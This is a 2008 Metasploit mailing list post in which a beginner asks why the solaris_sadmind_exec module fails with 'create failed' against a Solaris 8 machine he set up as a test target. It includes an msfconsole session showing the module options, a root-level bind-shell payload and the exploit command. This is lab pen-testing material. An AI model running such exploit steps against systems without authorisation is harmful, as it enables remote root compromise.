Metasploit mailing list archives

Exploit failed: create failed (with solaris/sunrpc/solaris_sadmind_exec)

From: mail2arthur at gmail.com (arthur zhang)
Date: Wed, 2 Apr 2008 13:50:21 -0400

Hi All,

I am new to pen-test/msf so I try to do something easily. I checkout msf
from svn to my Kubuntu 7.10 laptop (revision 5463), read msf user guide,
then install a fresh Solaris 8 to an old PC.

Port scan tells me that the solaris sadmind is running, and
http://www.ciac.org/ciac/bulletins/n-148.shtml confirms that the exploit is
also on x86.

However, I got ' Exploit failed: create failed' error when I exploited it. I
didn't find any details info regarding this error.

What can I do? Is there any way (e.g. increase log level) to give me more
clue on the error?

Thanks.

  :/usr/local/msf/trunk$ sudo ./msfconsole
       =[ msf v3.2-release
+ -- --=[ 278 exploits - 122 payloads
+ -- --=[ 17 encoders - 6 nops
       =[ 52 aux

msf exploit(solaris_sadmind_exec) > set

Global
======

  Name   Value
  ----   -----
  LHOST  10.15.8.218
  RHOST  10.15.10.15

Module: solaris/sunrpc/solaris_sadmind_exec

  Name                               Value
  ----                               -----
  ConnectTimeout                     10
  EnableContextEncoding              false
  EncoderDontFallThrough             false
  GID                                0
  LHOST                              10.15.8.218
  ONCRPC::tcp_request_fragmentation  false
  PAYLOAD                            generic/shell_bind_tcp
  RHOST                              10.15.10.15
  RPORT                              32772
  SSL                                false
  TARGET                             0
  TCP::max_send_size                 0
  TCP::send_delay                    0
  UID                                0
  WfsDelay                           0

msf exploit(solaris_sadmind_exec) > exploit
[*] Started bind handler